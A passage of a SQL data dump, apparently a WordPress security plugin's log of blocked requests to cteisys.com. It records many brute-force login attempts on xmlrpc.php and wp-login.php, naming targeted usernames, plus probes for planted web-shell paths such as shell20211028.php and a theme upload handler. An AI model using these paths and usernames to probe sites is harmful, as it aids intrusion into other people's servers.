244.133.254',3270804990,'newd',0,1664460269.6337,152,'CdjRxsIgr54EzaWGFKV7HN6Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664460277.2501,152,'iyK3r8Ou6x10dR9gIzoBATUn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.197.48.10',2596614154,'newd',0,1664460318.2668,152,'ZskMo3zpIFf7ShTDOaRxdjnE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.158.230.167',3634292391,'admin',0,1664460787.9044,152,'rKVcCB0R9uFI3ODsmfPqSg21','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.222.243.149',1038021525,'newd',0,1664461175.1958,152,'OobAImTVeHlUjGPNE3C9invh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.95.112.79',2522837071,'newd',0,1664461315.7287,152,'v8VokQlL2SsjPwEmWGUh36Aa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.116.16.173',1735659693,'newd',0,1664461726.6665,152,'GamubPNi6Uz7Z59rhMpdyQHE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.92.159.48',3193741104,'newd',0,1664462299.3988,152,'HNRKgZhPUYpT6XWw91m7iBa5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.0.140.186',2634058938,'newd',0,1664462853.3022,152,'sSW7qn1C6YbTAORdG2vweVy9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.111.84.214',795825366,'newd',0,1664463421.7010,152,'vDuAhQJUof7Y0Tmk8tI15Lsb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664463456.4683,152,'HmNIvY4QR1nLBOWGTJbCKwUf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.39',1386567207,'newd',0,1664463460.4946,152,'uiQhdHqDKL9b7Vapg1XI25fM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('204.93.193.216',3428696536,'newd',0,1664463464.7583,152,'Kk6mX2YdbPUth7v1SCfqwnMJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.205.144',1109511568,'newd',0,1664463473.6522,152,'lru0oOZtVMCscmhd8z5aUKG1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.91.94.100',3562757732,'newd',0,1664463478.4223,152,'AiCltVbB3Jy1Rfmn7ZUIgFk5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.169.144.135',1370067079,'newd',0,1664463486.2452,152,'s69UgnF5P8iK2kOjCEYoWGQv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.74.82.165',1632260773,'newd',0,1664463489.1469,152,'6RhYwCpJligGU8yNcXuELmPZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.239.110.241',737111793,'newd',0,1664463494.7513,152,'Qv8JrTfFe1LZtzXjlNkD2Hn0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('114.132.250.235',1921317611,'newd',0,1664463516.3449,152,'6aC2hJNPGmf8uoxH0Wc7T3Sq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('180.149.241.246',3029725686,'newd',0,1664463986.9723,152,'z73IFeXj1Ry4gMCq8rn5uOPJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.250.116.85',3640292437,'newd',0,1664465111.4774,152,'yu5k36cH9aETXn08sxfMR14G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.225.53.24',736179480,'newd',0,1664465239.3479,152,'CLaAWzoOsnkupFGbNUVDXj87','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.2.114',2994733682,'newd',0,1664465413.3872,152,'gAl4F0vzHP2skcmpTNxtDCSO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.20.231.167',2987714471,'newd',0,1664465415.7922,152,'npzuPXDY1fS0wlUdL8kMyaTC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.116.151',3098047639,'newd',0,1664465417.2091,152,'jg3zMK82TWVvCpxeharw95qG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.251.155.62',637246270,'newd',0,1664465427.5547,152,'Oyt4GEMKUcwXSHbzJgPakQmL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('168.138.1.42',2827616554,'newd',0,1664465436.4127,152,'Ao9hM283OJp7c6wmyX4l0bge','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.68.47.69',3158585157,'newd',0,1664465436.6225,152,'EkzNKFhp7oQjRaP5WL2tTMwc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.227.94',2335957854,'newd',0,1664465437.9739,152,'aO8dLZscuBQCg3GvSlYo4mMp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.27.125.16',1981512976,'newd',0,1664465444.2059,152,'T2hdM54OLnQe9wgDWruUjbEi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.91.94.100',3562757732,'newd',0,1664465449.9064,152,'hP49V527gjvIDCEiNuUtYd3M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.126',3110826110,'newd',0,1664465450.2823,152,'fcrxRMWdznUQSX5qGKTNv7Hg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.20.231.167',2987714471,'newd',0,1664465460.8953,152,'a4PmxzuJTgQXLkvpqUCFjY78','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('122.17.148.164',2047972516,'newd',0,1664465798.4424,152,'3tHjYSwXqn9DRLW126FckQa7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.162',1046910114,'joyce',0,1664466090.7289,152,'4jIdOqtH8WG5vnsiXL6TNkPl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.158.230.167',3634292391,'newd',0,1664466244.2664,152,'ukXbBYG6Ad3l4w9mg7VtKRpy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.112.202.112',3245394544,'newd',0,1664466354.2398,152,'5s09n218cfiAXdJEMh4q73LS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.3.20',1700987668,'newd',0,1664466454.4019,152,'8N0WmiMstfTvKOa1EbSBnwFr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664466458.0370,152,'RFGrX8Ds4mcjy1J5eloEp0tC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.12',3103917580,'newd',0,1664466464.4393,152,'5EFYwX1tZURIJOsoenzTuqMP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.77.159.184',860725176,'newd',0,1664466474.2962,152,'6oAChmyElOp73HikJXjQbWuM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.16',1386567184,'newd',0,1664466474.5231,152,'b6qD7mXBFTldriKOjtWPHvsp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664466474.8209,152,'JVqLfTNFOyt36DdSIkiuz2or','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664466480.3877,152,'hirSB5Ta1gfJ8l2zCduP3vLI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664466481.0149,152,'ZongEDvqs4zGdwk91jAlCJX0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.68.254',3496822014,'newd',0,1664466483.1368,152,'ZaVCNEQIAznByFjUO50Hg3Gd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.102.88.47',3110492207,'newd',0,1664466490.5014,152,'iNIMcXC0OfAKLpHFV9zgyvJQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.252.248.52',771553332,'newd',0,1664466491.2104,152,'V1S5yEaCnpo0OMs3f7I8FxAL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664466492.9090,152,'PdVX17v06aQ5mRhZfz9MCtr8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.222.243.149',1038021525,'newd',0,1664466930.3235,152,'2RkMQvWh7SmNb3qoLisfKHlj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.74.94',2953398878,'',0,1664466952.7608,55,'nD9ZOIisAfUj3GptVJLEyzdQ','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('176.9.74.94',2953398878,'',0,1664466956.7823,55,'WotYjDIXZg4RNyLSKUuM7aqr','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('176.9.74.94',2953398878,'',0,1664466960.6867,55,'fdE45sv8SRnQXixV3OpkZLzh','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('176.9.74.94',2953398878,'',0,1664466965.1366,55,'EmgiF1oJpWdNz4D0ryTfvau5','','19|0|0|0|cteisys.com/wp-plain.php',0,19,0),('64.42.179.59',1076540219,'joyce',0,1664467280.0839,152,'w7gR2pGMVzKBtoHYy6sILJiS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.73.237',2335918573,'newd',0,1664467387.0314,152,'lyIH7MS9ufBgWP0X2FxrTkOs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.9.158.112',1208589936,'newd',0,1664467522.3729,152,'Lm0zT4RWJEYlwApXDsjHakVF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.104.184.43',3110647851,'joyce',0,1664467676.6218,152,'Yy2m5FRNtjTVvW68DZnLd1zs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.29.138.73',1109232201,'newd',0,1664467958.3233,152,'moRfYJSOv7Ld3M5eNzkjEg2Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.87.239.76',3512201036,'newd',0,1664468087.3128,152,'OLDE6IsqWdUn35FHcYJ7rv1K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.102.28.107',1382423659,'joyce',0,1664468264.9654,152,'vaIdDx5scj0Cm8UVYw2kOqri','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.73.237',2335918573,'newd',0,1664468657.0398,152,'ZoBf2UMhuL6reDtaEdH5znxq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.174.248.107',3652122731,'newd',0,1664469060.3228,152,'uyjVaQFek1ADi9hU45TWfBLr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1664469649.0451,152,'Uu69cXlp0NF4iDahTYfyjnMO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('129.226.11.117',2179074933,'newd',0,1664469703.2173,152,'ck4ELdTlr6I2MsjXCJ1a07Vh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.227.190.34',1088667170,'newd',0,1664469703.6468,152,'wHA7PoS6N8mQDLpT9kVXMCla','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('129.226.11.117',2179074933,'newd',0,1664469709.5159,152,'3F7mgkiZMBVpyosTcY1JDAO5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.144.53',3265499189,'newd',0,1664469714.8939,152,'0XQUp86aP9xErW2RKbZmTLjf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.121.239',908425711,'newd',0,1664469717.1870,152,'5s8dFUfehDiNgCvn0Z1Y43br','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.163.146.52',1503892020,'newd',0,1664469719.0823,152,'cNGVQl2n7fiLpT8tkP4dzA1I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.205.144',1109511568,'newd',0,1664469724.5505,152,'Ym93hXEx4ebMDafLZ0NiFUOk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664469727.6775,152,'GTQ28njoM6WvOPsiLFe7HE1d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('118.27.125.16',1981512976,'newd',0,1664469734.6558,152,'Pfk7VEuhxZm2K1gqFeHMX0Oi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.113.41',3110826281,'newd',0,1664469741.8443,152,'3SmgcopdtuAj2WR4Pba7XLfs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.126.107.146',226388882,'newd',0,1664469790.1127,152,'ZDzhjlNcAJ5ux4idLvSMTy1a','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.60.32',3328326688,'nathaniel-lipka',0,1664469947.1222,51,'3eBcWlZ9KNUpQI1tqXhn6T0z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.149.77.114',764759410,'newd',0,1664470244.1488,152,'MSG5EgJrpo3xf1ndbjVl2RWZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.187.24.159',633018527,'newd',0,1664470354.9580,152,'Dx2CHOmNAFc9UhfT18Y0nzbp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.87.239.76',3512201036,'newd',0,1664470796.4937,152,'VKH8NksAYGQmaCnlc1od5BfP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('158.255.80.210',2667532498,'newd',0,1664470921.8667,152,'0ogtp7rvRQM69i8sAfK3mWHy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'Joyce',0,1664471381.3524,51,'BTJdboG9VOgr62s8tcCI4PWy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.167.51.34',1218917154,'newd',0,1664471481.3186,152,'NEShGFkQltb3fv7u0xAoZXTn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.236.20.246',1475089654,'newd',0,1664471927.1720,152,'0TgRu9XmrFPBcGyUO5zs7ILW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.75.146.208',860590800,'newd',0,1664472035.9540,152,'Bag2Mq47sRWAz9Uji50KPeoc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.210.66.35',533873187,'newd',0,1664472443.7143,152,'mUlq4hHDMwVKv61Jpx8n7sGN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.2.220',2673410780,'newd',0,1664472528.2439,152,'NePotLYEHyMzhbruUfvCRqXB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.219',90545371,'newd',0,1664472996.2809,152,'MOCcR8xL3jGUqPENi4HJrB0e','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.217.237',2733758957,'newd',0,1664473338.2786,152,'v35prtUmEaqCVD9xsonWkuHQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.88.147',2707511443,'newd',0,1664473367.1423,152,'U90L2TzpxmGPF6ceQjNZyoB1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.154.69.85',3097118037,'newd',0,1664473692.6218,152,'6S1203lsc4TeKoPMIVCvrqAd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('114.132.201.19',1921304851,'newd',0,1664473761.3414,152,'bEIS5yNcmxsG64LHjwWqhzJ3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.17.110',2884899182,'newd',0,1664474031.4540,152,'I31cDULPFw8AakRGtnXzv4TY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1664474401.5090,152,'GT5fWPR8vZMgyJxL47CVeilt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.106.15.209',661262289,'newd',0,1664474465.6213,152,'7lZDT1KLBu8bXc2x6wFhvGoS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.95.112.79',2522837071,'newd',0,1664474729.9586,152,'lT3tv8uEFe2zsfxS4qYWXamP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.103.104',2703452008,'newd',0,1664474831.0644,152,'3onVJqMlkDLwb8sSUTdNK1EC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('18.224.85.64',316691776,'newd',0,1664475180.5612,152,'DPpdNh87MjbWiFTwgxaUKEH0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.45',90545197,'newd',0,1664475866.3811,152,'OzwFXolSGEj4upx061Z5rBnI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.12.67.132',1024213892,'newd',0,1664475912.6767,152,'gDiyTnkqomhve8SGK1sRI4Wr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664476218.9013,7,'7zhbWNwrpCJ3ABvUKHo1YiLV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.101.156.45',90545197,'newd',0,1664476220.6226,152,'UW9mlr3a6TDMBtkf4pozyOYv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.148.12',2733741068,'newd',0,1664476306.2619,152,'FTG2IlPxuBE9HwR07ADWkoY1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.106.15.209',661262289,'newd',0,1664476587.0394,152,'lJcDOWK8xT4srCASmHgye359','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.251.219.111',1358682991,'newd',0,1664477385.5860,152,'GQlh14pImRVHyXcKUNTtF7gn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.219',90545371,'newd',0,1664477630.4005,152,'tiasZYIyTDuhnS3Ug0dVbP98','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.225.255.231',1138884583,'newd',0,1664477696.3658,152,'s1NWyR08e2S3KhbzijurGxO4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.107.137.177',661359025,'newd',0,1664478050.0996,152,'d2LYVIl4AUgRq5iPcrTnzN63','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('90.156.169.12',1520216332,'newd',0,1664478621.7877,152,'7rq6YvIicHNhDwOAma3ZgbMW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.182.150.188',2478216892,'newd',0,1664478656.7205,152,'CLDtyFW846XsupmafZVhP0jT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.85.69',2994754885,'newd',0,1664478901.7109,152,'xQp7uN5qT840B2HbUmXMtaEC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.223',1364735199,'newd',0,1664479272.2102,152,'YX8EZQizCyl0N2agVeKmdhUG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.39.235',3496814571,'newd',0,1664479337.1230,152,'qjWtzIvgPL5NVK0EQAXUOdwC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.8.58.8',1997027848,'newd',0,1664479570.2738,152,'VENiXLYglDzHIFm0ueKfbp2a','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('136.243.11.143',2297629583,'newd',0,1664479660.3242,152,'VhbnxNWLY9mRws4idjpHG5Kc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664479918.9865,152,'dk6XpzoBmqtnMWEA0PrK1Gjv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.14.89',1807552089,'newd',0,1664479931.5600,7,'DLM04QhFKvYOdICT8Eyc7Nbn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.81.214.91',3226588763,'newd',0,1664480005.3510,152,'6y0ou9vX2QGRhcIeUY4WlTs7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.6.184',1807550136,'nathaniel-lipka',0,1664480509.8894,51,'YEfRGPOK5uDChx4MenU1vw87','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.50.216',3328324312,'nathaniel-lipka',0,1664482486.8600,51,'XdMmkDL4uCPTlqVJNE3KFhRi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.44.126',3515690110,'Joyce',0,1664484329.1859,51,'0scYty8DZaJvqfNbKIhPrFux','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.39.104.183',86468791,'',0,1664498860.4168,55,'0G5fs9FD2Mg7kSREPc83ZzeX','','19|0|0|0|cteisys.com/wp-static.php',0,19,0),('209.141.48.210',3515691218,'newd',0,1664499980.2487,7,'EGvSph30UWidQnqP2stNxKya','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('141.98.102.187',2372036283,'joyce',0,1664500949.5234,152,'65jZEbCmJ4z9sMqKvUHRtipQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.206.225.51',3117343027,'joyce',0,1664506018.2996,152,'MHp9qWNRm4U7AZzEsti1Ydjo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.44.126',3515690110,'Joyce',0,1664508577.4118,51,'qJCI6cYGXW759pAa04LMZ2kE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.221.163',3091979683,'joyce',0,1664508706.1687,152,'pNmy0vBqJrPZ9CMIdaA13w4f','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.38.20.161',3257275553,'',0,1664508860.4644,55,'mWtXGzualeNg0Q9cKEbwr837','','19|0|0|0|cteisys.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php',0,19,0),('20.199.113.4',348614916,'',0,1664510758.2500,55,'Muq0kOGl392Hyd5FLQRTt8Ca','','19|0|0|0|cteisys.com/wp-includes/class-index-wordpress.php',0,19,0),('20.199.113.4',348614916,'',0,1664510760.6066,55,'aBgWRP8lKNmTewzxOiMfsrh5','','19|0|0|0|cteisys.com/wp-admin/js/widgets/wp-login.php',0,19,0),('20.199.113.4',348614916,'',0,1664510762.7775,55,'IUO8TLDkpb3xsGHiun1QtwBS','','19|0|0|0|cteisys.com/wp-includes/wp-system-cloud.php',0,19,0),('20.199.113.4',348614916,'',0,1664510764.9222,55,'cGtHhQJz0SLxeKjZ3yIvbTi8','','19|0|0|0|cteisys.com/wp-includes/class-wp-page-icon.php',0,19,0),('20.199.113.4',348614916,'',0,1664510767.0406,55,'zHm9cUPAhQqfDFjgX437i5xM','','19|0|0|0|cteisys.com/wp-includes/class-wordpress-license.php',0,19,0),('20.199.113.4',348614916,'',0,1664510767.0463,10,'zHm9cUPAhQqfDFjgX437i5xM','','707|0|0|0|cteisys.com/wp-includes/class-wordpress-license.php',0,707,0),('37.120.217.243',628677107,'joyce',0,1664510982.6451,152,'5laRxOKgce7FpjSBIqZbsdQU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.89.160.131',2556010627,'joyce',0,1664511684.3899,152,'bTdSa4oHpLF0c7sNWyGYwB3m','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'nathaniel-lipka',0,1664512118.3388,51,'mGs2pDvk5EY3LwH6joIqWOZU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.5',3583549701,'joyce',0,1664516322.2806,152,'9mIlju1E2HTz6beQtp0x5i3w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.244.77.192',1760841152,'newd',0,1664517724.0316,7,'1qPYOjWEnbM9HQ3rR5ysdcpB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.171.181.53',1739306293,'admin',0,1664517751.9968,152,'vlTLPis8JFnAOtEpjbzgaCQy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.67.171',3270067115,'admin',0,1664518338.2269,152,'oELWGUOpIT2F04mx3B59DZiY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.14.89',1807552089,'nathaniel-lipka',0,1664518601.5053,51,'hzgdlx4kPbI2fMGmTWtCO7Qq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.74.120.192',1732933824,'admin',0,1664519072.6936,152,'C5TaeisQfK6Stlq4zyxYh1Zv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('96.47.229.59',1613751611,'joyce',0,1664520048.5151,152,'cfLZRpBNIjlxTdumDakFEgSP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('131.255.7.10',2214528778,'newd',0,1664520330.2465,152,'GzmV3WhLQqSjaTn1YA9fIrue','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.99.69.189',2338538941,'newd',0,1664520938.7114,152,'vJ7fzknqwl2oPpLKFU5DbV0W','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664521456.6126,7,'xnNsfcWg0PGzwlTOJ693FYBj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('37.187.24.159',633018527,'newd',0,1664522266.5083,152,'QA3xFPHkOaGylm4J1UbzZndX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.90.175',1701010095,'newd',0,1664524324.2363,152,'ahnJZ8b1X2vYx0KDmipsefRU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.102.27.195',1382423491,'joyce',0,1664524562.4099,152,'qadztOwY5rIEc64VsGLubFhM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.79.206.104',575655528,'newd',0,1664524919.4158,152,'iT6cfA17OClyGMPF5vhJgXRI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.248.44',3488938028,'newd',0,1664525679.0671,152,'XRCnvoF2YScWZ8mVUst91KOI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.157.162',2388499874,'newd',0,1664526281.9560,152,'xgP1ylbJucKkdha27ZrpIDXA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.70.98.118',2084987510,'newd',0,1664527040.1655,152,'wurBg83Kdpz65JlSvQmVyeOb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.119.178.3',1551348227,'joyce',0,1664527503.2426,152,'kU0toWc57Y4Rb1BvadjiPKwf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.218.143.243',148541427,'newd',0,1664528988.6387,152,'mIqdays4BlhAPDrKUz8T9VQC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('40.122.149.171',679122347,'newd',0,1664529738.0928,152,'hlx9wuX5PFo4RYEKNaebkWGS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.159.15.23',866062103,'newd',0,1664530354.6800,152,'v3GCla7SocQrMnZsPT9feK4t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.90.101.113',1046111601,'newd',0,1664531101.0001,152,'G0mu7L1RhUabNMfFAcgID3QY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'newd',0,1664531719.6942,152,'x8sYmFiwVhZtSD63fbjIveCu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.46.253',3515690749,'Joyce',0,1664532207.9446,51,'OexQ73ogHt1ATJfGDb9vspYM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.233.69.10',3270067466,'newd',0,1664532467.2090,152,'DpIuiS0y7NRUw5s4qCaLJZFk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664533059.4617,152,'h0VRqyezZpAcb8Q1vYTOs6wa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.51.74',3328324426,'nathaniel-lipka',0,1664533340.4042,51,'Ciy3OnvjVYNp4EIbXlw75gJ9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.170.41',2673453609,'newd',0,1664533840.1208,152,'K2csTF3gtzwlLRo1YSIrJZ87','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1664534457.6782,152,'ejrXCkoV7UNnEfzvyuOiL5PF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.117.143',3451483535,'Joyce',0,1664534644.7957,51,'qPVuFAM9GsUi8cDTSHzl3Rje','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1664535203.4689,152,'m3gZyF68kXod7nPfxzIDU0je','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.244.77.192',1760841152,'newd',0,1664535496.5384,7,'tqc7e6pQ2FI9AsirVwERuSDN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.87.194.140',1347928716,'newd',0,1664537159.5669,152,'YKNtbvdpscCi5GVZTBrFHPog','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.126.159.4',2424217348,'newd',0,1664537611.7697,152,'ZCBGDpIfvWdYFs67LmPrQNOT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.197.195.173',3116745645,'newd',0,1664537860.3630,152,'fcpj2O3HUG5obBn48yIMXhtE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.30.143',860823183,'newd',0,1664538258.5764,152,'ZT1wg5RWHvF7oCKhJMAnSykb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('108.179.253.75',1823735115,'newd',0,1664538428.6089,152,'fzE23BQ4LSr6bw5RaxYMIUl0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.102.36',148006436,'newd',0,1664538638.4636,152,'yQOTqrcnbwoUJ4KNAlxSsZ3D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0